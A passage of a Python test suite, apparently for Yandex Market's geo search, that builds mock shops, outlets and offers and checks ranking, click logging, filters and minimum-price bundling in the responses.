'place=geo&how=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&text=kayak&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n )\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1104, cb=1, cp=1)\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n def test_geo_text_search_autobroker_tail_in_param_how(self):\n '''Что тестируем: автоброкер как на поиске, для второго цикла по офферам'''\n _ = self.report.request_json(\n 'place=geo&how=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&page=2&text=kayak&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n )\n # 1ый оффер подпертый 3им, оффер из CPA категории\n\n # 3ий оффер подпертый 4ым, оффер из CPA категории\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n\n # 4ый оффер не подпертый, оффер из CPC категории\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n # 1ый оффер подпертый 4ым, оффер из CPA категории\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1).times(2)\n\n def test_geo_category_search_cpc_autobroker_head_in_param_how(self):\n '''Что тестируем: автоброкер для категорийной выдачи, для первого цикла по офферам, категория CPC'''\n _ = self.report.request_json(\n 'place=geo&how=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&hid=3002&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n '&rearr-factors=market_use_books_pessimization=1'\n )\n # 1ый оффер подпертый 3им\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n\n # 3ий оффер подпертый 4ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n\n # 4ый оффер подпертый 5ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n # 5ый оффер, не подпертый\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1104, cb=1, cp=1)\n\n def test_geo_category_search_cpc_autobroker_tail_in_param_how(self):\n '''Что тестируем: автоброкер для категорийной выдачи, для второго цикла по офферам, категория CPC'''\n _ = self.report.request_json(\n 'place=geo&how=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&page=2&hid=3002&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n '&rearr-factors=market_use_books_pessimization=1'\n )\n # 1ый оффер подпертый 3им\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n\n # 3ий оффер подпертый 4ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n\n # 4ый оффер не подпертый\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n # 1ый оффер подпертый 4ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n\n def test_geo_search_outlet_ranking_in_param_how(self):\n '''Что тестируем: сортировку аутлетов по растоянию на поиске'''\n response = self.report.request_json(\n 'place=geo&how=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=10&text=kayak&rids=1®set=1&fesh=1101'\n )\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1211\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1214\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1212\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1213\"}},\n ],\n preserve_order=True,\n allow_different_len=False,\n )\n\n def test_geo_text_search(self):\n '''Что тестируем: сортировку как на поиске'''\n response = self.report.request_json(\n 'place=geo&default-how-on-geo=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=10&text=kayak&rids=1®set=1'\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 10, \"shops\": 4, \"shopOutlets\": 10}})\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 3_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 5_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 4_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 3_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 4_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 4_from_3002\"}},\n {\"entity\": \"offer\", \"titles\": {\"raw\": \"kayak 1_from_3001\"}},\n ],\n preserve_order=True,\n allow_different_len=False,\n )\n\n def test_geo_text_search_autobroker_head(self):\n '''Что тестируем: автоброкер как на поиске, для первого цикла по офферам'''\n _ = self.report.request_json(\n 'place=geo&default-how-on-geo=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&text=kayak&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n )\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1104, cb=1, cp=1)\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n def test_geo_text_search_autobroker_tail(self):\n '''Что тестируем: автоброкер как на поиске, для второго цикла по офферам'''\n _ = self.report.request_json(\n 'place=geo&default-how-on-geo=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&page=2&text=kayak&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n )\n # 1ый оффер подпертый 3им, оффер из CPA категории\n\n # 3ий оффер подпертый 4ым, оффер из CPA категории\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n\n # 4ый оффер не подпертый, оффер из CPC категории\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n # 1ый оффер подпертый 4ым, оффер из CPA категории\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1).times(2)\n\n def test_geo_category_search_cpc_autobroker_head(self):\n '''Что тестируем: автоброкер для категорийной выдачи, для первого цикла по офферам, категория CPC'''\n _ = self.report.request_json(\n 'place=geo&default-how-on-geo=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&hid=3002&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n '&rearr-factors=market_use_books_pessimization=1'\n )\n # 1ый оффер подпертый 3им\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n\n # 3ий оффер подпертый 4ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n\n # 4ый оффер подпертый 5ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n # 5ый оффер, не подпертый\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1104, cb=1, cp=1)\n\n def test_geo_category_search_cpc_autobroker_tail(self):\n '''Что тестируем: автоброкер для категорийной выдачи, для второго цикла по офферам, категория CPC'''\n _ = self.report.request_json(\n 'place=geo&default-how-on-geo=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=4&page=2&hid=3002&rids=1®set=1&show-urls=external,cpa&show-geo-cpa=1'\n '&rearr-factors=market_use_books_pessimization=1'\n )\n # 1ый оффер подпертый 3им\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n\n # 3ий оффер подпертый 4ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1102, cb=1, cp=1)\n\n # 4ый оффер не подпертый\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1103, cb=1, cp=1)\n\n # 1ый оффер подпертый 4ым\n self.click_log.expect(ClickType.EXTERNAL, shop_id=1101, cb=1, cp=1)\n\n def test_geo_search_outlet_ranking(self):\n '''Что тестируем: сортировку аутлетов по растоянию на поиске'''\n response = self.report.request_json(\n 'place=geo&default-how-on-geo=search&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n '&numdoc=10&text=kayak&rids=1®set=1&fesh=1101'\n )\n self.assertFragmentIn(\n response,\n [\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1211\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1214\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1212\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"1213\"}},\n ],\n preserve_order=True,\n allow_different_len=False,\n )\n\n @classmethod\n def prepare_clicks_for_fixtariff_shop_in_geo(cls):\n cls.index.hypertree += [HyperCategory(hid=700, output_type=HyperCategoryType.GURU)]\n cls.index.models += [\n Model(hyperid=3010, title='model for fix tariff', hid=700),\n ]\n cls.index.shops += [\n Shop(fesh=702, home_region=225, tariff=\"FIX\", online=False),\n ]\n cls.index.outlets += [\n Outlet(point_id=702, fesh=702, region=213, point_type=Outlet.FOR_PICKUP),\n ]\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=8001,\n fesh=702,\n carriers=[99],\n options=[PickupOption(outlet_id=702)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n cls.index.offers += [\n Offer(hyperid=3010, fesh=702, title='offer for fix tariff', pickup_buckets=[8001]),\n ]\n\n def test_clicks_for_fixtariff_shop_in_geo(self):\n for pp in [24, 25, 26, 27]:\n _ = self.report.request_json('place=geo&hyperid=3010&rids=213&show-urls=geo&pp={}'.format(pp))\n self.click_log.expect(ClickType.GEO, shop_id=702, cb=0, cp=0).times(4)\n\n @classmethod\n def prepare_filters_ignorance_test(cls):\n \"\"\"\n Создаем магазины и аутлеты, а также 5 офферов.\n\n Один из офферов подходит под все фильтры из таблицы\n https://wiki.yandex-team.ru/users/msheglov/Kontekstnost-vydachi/#filtrytretegotipa\n\n Три оффера не подходят под один из фильтров shops, book-now и offer-shipping и все\n они CPA_NO\n\n Еще один не подходит под эти фильтры, за исключением cpa, shops, book-now и\n offer-shipping\n \"\"\"\n cls.index.shops += [\n Shop(fesh=18001, priority_region=213, new_shop_rating=NewShopRating(new_rating_total=5.0)),\n Shop(fesh=18002, priority_region=213, new_shop_rating=NewShopRating(new_rating_total=5.0)),\n Shop(fesh=18003, priority_region=213, new_shop_rating=NewShopRating(new_rating_total=5.0)),\n Shop(fesh=18004, priority_region=213, new_shop_rating=NewShopRating(new_rating_total=5.0)),\n Shop(fesh=18005, priority_region=213, new_shop_rating=NewShopRating(new_rating_total=3.0), home_region=10),\n ]\n\n cls.index.outlets += [\n Outlet(point_id=18201, fesh=18001, region=213, point_type=Outlet.FOR_STORE),\n Outlet(point_id=18202, fesh=18002, region=213, point_type=Outlet.FOR_STORE),\n Outlet(point_id=18203, fesh=18003, region=213, point_type=Outlet.FOR_STORE),\n Outlet(point_id=18204, fesh=18004, region=213, point_type=Outlet.FOR_PICKUP),\n Outlet(point_id=18205, fesh=18005, region=213, point_type=Outlet.FOR_STORE),\n ]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=9001,\n fesh=18001,\n carriers=[99],\n options=[PickupOption(outlet_id=18201)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9002,\n fesh=18002,\n carriers=[99],\n options=[PickupOption(outlet_id=18202)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9003,\n fesh=18003,\n carriers=[99],\n options=[PickupOption(outlet_id=18203)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9004,\n fesh=18004,\n carriers=[99],\n options=[PickupOption(outlet_id=18204)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9005,\n fesh=18005,\n carriers=[99],\n options=[PickupOption(outlet_id=18205)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n booking1 = BookingAvailability(outlet_id=18201, region_id=213, amount=15)\n booking2 = BookingAvailability(outlet_id=18202, region_id=213, amount=15)\n _ = BookingAvailability(outlet_id=18203, region_id=213, amount=15)\n booking4 = BookingAvailability(outlet_id=18204, region_id=213, amount=15)\n booking5 = BookingAvailability(outlet_id=18205, region_id=213, amount=15)\n\n cls.index.offers += [\n Offer(\n hyperid=18101,\n fesh=18001,\n title='ideal-offer',\n price_old=150,\n booking_availabilities=[booking1],\n delivery_options=[\n DeliveryOption(price=0, day_from=1, day_to=1),\n ],\n pickup_buckets=[9001],\n ),\n Offer(\n hyperid=18101,\n fesh=18002,\n title='no-cpa-filtered-shop',\n price_old=150,\n booking_availabilities=[booking2],\n pickup_buckets=[9002],\n ),\n Offer(hyperid=18101, fesh=18003, title='no-cpa-without-book-now', price_old=150, pickup_buckets=[9003]),\n Offer(\n hyperid=18101,\n fesh=18004,\n title='no-cpa-no-store',\n price_old=150,\n store=False,\n booking_availabilities=[booking4],\n pickup_buckets=[9004],\n ),\n Offer(\n hyperid=18101,\n fesh=18005,\n title='almost-ideal-offer',\n price=900,\n manufacturer_warranty=False,\n booking_availabilities=[booking5],\n delivery_options=[\n DeliveryOption(price=100, day_from=1, day_to=5),\n ],\n pickup_buckets=[9005],\n ),\n ]\n\n def test_geo_without_filters(self):\n \"\"\"\n Что тестируем: запрос за офферами на geo без явного указания фильтров\n возвращает все офферы модели\n\n Делаем запрос за офферами на geo без фильтров для модели 18101\n Ожидаем, что возвращается 5 офферов\n \"\"\"\n response = self.report.request_json('place=geo&hyperid=18101&numdoc=20&rids=213')\n self.assertFragmentIn(response, {\"search\": {\"total\": 5}})\n self.assertEqual(response.count({\"entity\": \"offer\"}), 5)\n\n def test_geo_with_filters(self):\n \"\"\"\n Что тестируем: запрос за офферами на geo с явным указанием фильтров\n отфильтровывает все офферы, кроме \"идеального\"\n\n Делаем запрос за офферами на странице offers с фильтрами для модели 18101\n Ожидаем, что возвращается один \"идеальный\" оффер\n \"\"\"\n response = self.report.request_json('place=geo&hyperid=18101&numdoc=20&rids=213%s' % SEARCH_FILTERS)\n self.assertFragmentIn(response, {\"search\": {\"total\": 1}})\n self.assertEqual(response.count({\"entity\": \"offer\"}), 1)\n self.assertFragmentIn(response, {\"titles\": {\"raw\": \"ideal-offer\"}})\n\n def test_geo_with_filters_ignorance(self):\n \"\"\"\n Что тестируем: запрос за офферами на странице offers с явным указанием фильтров\n и флажком &relax-filters=1 игнорирует фильтры, кроме cpa, shops, book-now и\n offer-shipping\n\n Делаем запрос за офферами на странице offers с фильтрами для модели 18101\n и флажком &relax-filters=1\n Ожидаем, что возвращается 2 оффера - \"идеальный\" и тот, который подходит под все\n фильтры, кроме игнорируемых\n \"\"\"\n response = self.report.request_json(\n 'place=geo&hyperid=18101&numdoc=20&rids=213&relax-filters=1%s' % SEARCH_FILTERS\n )\n self.assertFragmentIn(response, {\"search\": {\"total\": 2}})\n self.assertEqual(response.count({\"entity\": \"offer\"}), 2)\n self.assertFragmentIn(response, {\"titles\": {\"raw\": \"ideal-offer\"}})\n self.assertFragmentIn(response, {\"titles\": {\"raw\": \"almost-ideal-offer\"}})\n\n @classmethod\n def prepare_attraction(cls):\n cls.index.models += [\n Model(hyperid=2102, hid=2002),\n ]\n cls.index.offers += [\n Offer(hyperid=2102, title='1_from_2102', bid=500, fesh=1101, pickup_buckets=[7001]),\n Offer(hyperid=2102, title='2_from_2102', bid=400, fesh=1105, pickup_buckets=[7005]), # Out of sight\n Offer(hyperid=2102, title='3_from_2102', bid=300, fesh=1102, pickup_buckets=[7002]),\n Offer(hyperid=2102, title='4_from_2102', bid=200, fesh=1103, pickup_buckets=[7003]),\n Offer(hyperid=2102, title='5_from_2102', bid=100, fesh=1104, pickup_buckets=[7004]),\n ]\n\n @staticmethod\n def __create_attraction_point_request(geoLocation=None, userId=None, addBounds=True, addDebug=True, how=None):\n request = 'place=geo&rids=1&hyperid=2102&geo-attraction-distance=7000' # Расстояние 7000м - требуется для тестовых координат. 2000м, заданных по умолчанию мало.\n if how is not None:\n request += '&how={}'.format(how)\n if addDebug:\n request += '&debug=da'\n if geoLocation is not None:\n request += '&geo-location={}'.format(geoLocation)\n if addBounds:\n request += '&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.6,55.6'\n if userId is not None:\n request += '&puid={}'.format(userId)\n\n return request\n\n def __test_add_attraction_point(self, response, name, coord):\n # Проверка добавления точки притяжения\n # TODO Добавить проверку координат после исправления GeoPoint (перепутаны широта с долготой). https://st.yandex-team.ru/MARKETOUT-12400\n # addText = 'Add attraction point: {}: {}'.format(name, coord)\n addText = 'Add attraction point: {}:'.format(name)\n self.assertFragmentIn(response, {'logicTrace': [Contains(addText)]})\n\n def __test_missed_attraction_point(self, response, name=None, coord=None):\n # Проверка добавления точки притяжения\n missedText = 'Add attraction point: '\n if name is not None:\n missedText += '{}:'.format(name)\n # TODO Добавить проверку координат после исправления GeoPoint (перепутаны широта с долготой)\n # if coord is not None:\n # missedText += ' {}'.format(coord)\n self.assertFragmentNotIn(response, {'logicTrace': [Contains(missedText)]})\n\n def __test_filter_attraction_point(self, response, name, coord):\n # Проверка отфильтровки точки притяжения, не попавшей в окно\n # TODO Добавить проверку координат после исправления GeoPoint (перепутаны широта с долготой)\n # filterText = 'Attraction point filtered by geo-bounds: {}: {}'.format(name, coord)\n filterText = 'Attraction point filtered by geo-bounds: {}:'.format(name)\n self.__test_missed_attraction_point(response, name)\n self.assertFragmentIn(response, {'logicTrace': [Contains(filterText)]})\n\n def test_cgi_param_attraction_points(self):\n '''\n Что тестируем: добавляются точки притяжения, переданные через параметры\n '''\n response = self.report.request_json(\n self.__create_attraction_point_request(geoLocation=LOCATION_GPS_COORD)\n + '&geo-attraction={}'.format(FAR_GPS_COORD)\n + '&geo-attraction={}'.format(HOME_GPS_COORD)\n )\n self.__test_add_attraction_point(response, 'cgi-param', FAR_GPS_COORD)\n self.__test_add_attraction_point(response, 'cgi-param', HOME_GPS_COORD)\n\n def assert_equal_json_responses_without_click_urls(self, request1, request2):\n self.assertEqualJsonResponses(request1, request2)\n\n def __test_ranking_with_attraction_points(self, request, outletsOrder):\n # Запрашиваем общий список\n response = self.report.request_json(request)\n self.assertFragmentIn(\n response,\n [{\"entity\": \"offer\", \"outlet\": {\"id\": \"{}\".format(outlet_id)}} for outlet_id in outletsOrder],\n preserve_order=True,\n allow_different_len=False,\n )\n\n # Проверяем сохранения порядка при разбиении на страницы\n for i in [1, 10]:\n response = self.report.request_json(request + '&numdoc=1&page={}'.format(i))\n self.assertFragmentIn(\n response,\n [{\"entity\": \"offer\", \"outlet\": {\"id\": \"{}\".format(outletsOrder[i - 1])}}],\n preserve_order=True,\n allow_different_len=False,\n )\n\n def test_offer_shipping_delivery(self):\n # Что тестируем: запрос c offer-shipping=delivery игнорирует этот фильтр\n # и возвращает аутлеты типов pickup и store\n response = self.report.request_json('place=geo&offer-shipping=delivery&hid=501&rids=0')\n self.assertFragmentIn(response, {\"outlet\": {\"type\": \"pickup\"}})\n self.assertFragmentIn(response, {\"outlet\": {\"type\": \"store\"}})\n\n def test_multiple_point_id(self):\n \"\"\"Проверяется, что фильтр &point_id с несколькими значениями отрабатывает корректно\"\"\"\n response = self.report.request_json('place=geo&text=good11&rids=1&point_id=212,214,215')\n self.assertFragmentIn(\n response,\n {\n \"total\": 3,\n \"results\": [\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"212\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"214\"}},\n {\"entity\": \"offer\", \"outlet\": {\"id\": \"215\"}},\n ],\n },\n )\n self.assertEqual(3, response.count({\"outlet\": {}}))\n\n @classmethod\n def prepare_bundle_min_price(cls):\n cls.index.hypertree += [\n HyperCategory(hid=730),\n HyperCategory(hid=731),\n HyperCategory(hid=732),\n ]\n cls.index.models += [\n Model(hyperid=73, hid=730),\n Model(hyperid=74, hid=730),\n Model(hyperid=75, hid=731),\n Model(hyperid=76, hid=732),\n ]\n cls.index.shops += [\n Shop(fesh=7301, priority_region=1, name='Shop_7301'),\n Shop(fesh=7302, priority_region=1, name='Shop_7302'),\n Shop(fesh=7303, priority_region=1),\n ]\n\n cls.index.outlets += [\n Outlet(point_id=7301, fesh=7301, region=1, gps_coord=GpsCoord(37.1, 55.1)),\n Outlet(point_id=7302, fesh=7302, region=1, gps_coord=GpsCoord(37.1, 55.1)),\n Outlet(point_id=7303, fesh=7303, region=1, gps_coord=GpsCoord(30.0, 50.0)),\n Outlet(point_id=7304, fesh=7304, region=1, gps_coord=GpsCoord(30.1, 50.1)),\n ]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=9101,\n fesh=7301,\n carriers=[99],\n options=[PickupOption(outlet_id=7301)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9102,\n fesh=7302,\n carriers=[99],\n options=[PickupOption(outlet_id=7302)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9103,\n fesh=7303,\n carriers=[99],\n options=[PickupOption(outlet_id=7303)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9104,\n fesh=7304,\n carriers=[99],\n options=[PickupOption(outlet_id=7304)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n cls.index.offers += [\n Offer(hyperid=73, title='1_73_shop1', price=123, fesh=7301, pickup_buckets=[9101]),\n Offer(hyperid=73, title='2_73_shop1', price=126, fesh=7301, pickup_buckets=[9101]),\n Offer(hyperid=73, title='3_73_shop1', price=120, fesh=7301, pickup_buckets=[9101]),\n Offer(hyperid=74, title='1_74_shop1', price=140, fesh=7301, pickup_buckets=[9101]),\n Offer(hyperid=74, title='2_74_shop2', price=274.1, fesh=7302, pickup_buckets=[9102]),\n # Для проверки, что в минимальную цену не включаются офферы из других категорий\n Offer(hid=731, hyperid=75, title='telephone 1', price=456, fesh=7303, pickup_buckets=[9103], randx=100),\n Offer(hid=731, hyperid=75, title='telephone 2', price=420, fesh=7303, pickup_buckets=[9103], randx=100),\n Offer(hid=732, hyperid=76, title='telephone 3', price=410, fesh=7303, pickup_buckets=[9103], randx=1),\n Offer(hid=732, hyperid=76, title='telephone 4', price=440, fesh=7303, pickup_buckets=[9103], randx=1),\n Offer(hid=731, hyperid=75, title='telephone 5', price=100, fesh=7304, pickup_buckets=[9104], randx=100),\n Offer(hid=732, hyperid=76, title='telephone 6', price=101, fesh=7304, pickup_buckets=[9104], randx=1),\n ]\n cls.index.currencies = [\n Currency(\n name=Currency.BYN,\n exchange_rates=[\n ExchangeRate(to=Currency.RUR, rate=0.5),\n ],\n ),\n ]\n\n def test_bundle_min_price_in_category(self):\n \"\"\"\n Проверяем, что на заданном оффере минимальная цена считается среди офферов из этого же магазина и из категории оффера,\n а также, что кол-во офферов из этого же магазина учитывает только офферы из категории заданного оффера\n \"\"\"\n\n response = self.report.request_json(\n 'place=geo&geo-location=30.0,50.0&geo_bounds_lb=29.9,49.9&geo_bounds_rt=30.2,50.2&text=telephone&rids=1'\n )\n\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"telephone 1\"},\n \"bundled\": {\n \"shopCategory\": {\n \"minPrice\": {\"value\": \"420\"},\n \"count\": 2,\n },\n \"count\": 4,\n },\n },\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"telephone 5\"},\n \"bundled\": {\n \"shopCategory\": {\n \"minPrice\": {\"value\": \"100\"},\n \"count\": 1,\n },\n \"count\": 2,\n },\n },\n ],\n )\n\n \"\"\"\n Проверяем, что при задании конкретной точки на карте отдается 'bundled'\n \"\"\"\n response = self.report.request_json(\"place=geo&point_id=7302&text=_shop\")\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"bundled\": {\n \"shopCategory\": {\n \"minPrice\": {\n \"value\": \"274\",\n },\n \"count\": 1,\n }\n },\n }\n ],\n )\n\n def test_bundle_min_price_BYN(self):\n \"\"\"\n Проверяем, что минимальная цена считается правильно (в валюте пользователя)\n \"\"\"\n response = self.report.request_json(\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&text=_shop&rids=0¤cy=BYN'\n )\n\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"bundleCount\": 4,\n \"bundled\": {\n \"count\": 4,\n \"shopCategory\": {\n \"count\": 4,\n \"minPrice\": {\n \"currency\": \"BYN\",\n \"value\": \"240\",\n },\n },\n },\n },\n {\n \"entity\": \"offer\",\n \"bundleCount\": 1,\n \"bundled\": {\n \"count\": 1,\n \"shopCategory\": {\n \"count\": 1,\n \"minPrice\": {\n \"currency\": \"BYN\",\n \"value\": \"548.2\",\n },\n },\n },\n },\n ],\n )\n\n def test_bundle_min_price_RUB(self):\n \"\"\"\n Проверяем, что минимальная цена считается правильно\n \"\"\"\n response = self.report.request_json(\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&text=_shop&rids=0'\n )\n\n self.assertFragmentIn(\n response,\n [\n {\n \"entity\": \"offer\",\n \"bundleCount\": 4,\n \"bundled\": {\n \"count\": 4,\n \"shopCategory\": {\n \"count\": 4,\n \"minPrice\": {\n \"currency\": \"RUR\",\n \"value\": \"120\",\n },\n },\n },\n },\n {\n \"entity\": \"offer\",\n \"bundleCount\": 1,\n \"bundled\": {\n \"count\": 1,\n \"shopCategory\": {\n \"count\": 1,\n \"minPrice\": {\n \"currency\": \"RUR\",\n \"value\": \"274\",\n },\n },\n },\n },\n ],\n )\n\n @classmethod\n def prepare_cpa_no_offers_with_delivery_service_on_geo(cls):\n cls.index.shops += [\n Shop(\n fesh=17000,\n priority_region=2,\n name='Shop17000',\n delivery_service_outlets=[17002],\n )\n ]\n\n cls.index.outlets += [\n Outlet(\n point_id=17002,\n delivery_service_id=17001,\n region=4,\n point_type=Outlet.FOR_PICKUP,\n delivery_option=OutletDeliveryOption(\n shipper_id=103, day_from=1, day_to=1, order_before=2, work_in_holiday=True, price=100\n ),\n working_days=[i for i in range(10)],\n gps_coord=GpsCoord(lon=37.12, lat=55.32),\n ),\n ]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=9201,\n carriers=[17001],\n options=[PickupOption(outlet_id=17002)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n cls.index.offers += [Offer(fesh=17000, title='NoneCpaOfferWithOutlet', hyperid=17003, pickup_buckets=[9201])]\n\n def test_cpa_no_offers_with_delivery_service_on_geo_in_param_how(self):\n \"\"\"\n Что тестируем: показ на geo не СРА офера, имеющего точки ПВЗ от служб доставки\n \"\"\"\n for extra in ['', '&how=model_card']:\n response = self.report.request_json(\n 'place=geo&hyperid=17003&fesh=17000&rids=4&show-urls=geo&geo_bounds_rt=37.30%2C56.2&geo_bounds_lb=37.0%2C55.1&geo-location=37.1%2C55.15'\n + extra\n )\n self.assertFragmentIn(\n response,\n {'results': [{'entity': 'offer', 'titles': {'raw': 'NoneCpaOfferWithOutlet'}}]},\n allow_different_len=False,\n )\n\n def test_cpa_no_offers_with_delivery_service_on_geo(self):\n \"\"\"\n Что тестируем: показ на geo не СРА офера, имеющего точки ПВЗ от служб доставки\n \"\"\"\n for extra in ['', '&default-how-on-geo=model_card']:\n response = self.report.request_json(\n 'place=geo&hyperid=17003&fesh=17000&rids=4&show-urls=geo&geo_bounds_rt=37.30%2C56.2&geo_bounds_lb=37.0%2C55.1&geo-location=37.1%2C55.15'\n + extra\n )\n self.assertFragmentIn(\n response,\n {'results': [{'entity': 'offer', 'titles': {'raw': 'NoneCpaOfferWithOutlet'}}]},\n allow_different_len=False,\n )\n\n @classmethod\n def prepare_not_only_top_offer_outlets(cls):\n \"\"\"\n Для проверки отображения точек магазина, в которых нет самого \"релевантного\" оффера,\n создаём магазин с тремя офферами и тремя аутлетами.\n Каждый оффер продаётся только в одном аутлете. Сами офферы определены в классе _Offers.\n \"\"\"\n cls.index.shops += [Shop(fesh=12320, priority_region=213, delivery_service_outlets=[12323])]\n\n cls.index.outlets += [\n Outlet(\n point_id=12321, fesh=12320, region=213, point_type=Outlet.FOR_STORE, gps_coord=GpsCoord(37.12, 55.32)\n ),\n Outlet(\n point_id=12322, fesh=12320, region=213, point_type=Outlet.FOR_PICKUP, gps_coord=GpsCoord(38.12, 54.67)\n ),\n Outlet(\n point_id=12323,\n region=213,\n point_type=Outlet.FOR_POST_TERM,\n delivery_service_id=1030,\n gps_coord=GpsCoord(36.19, 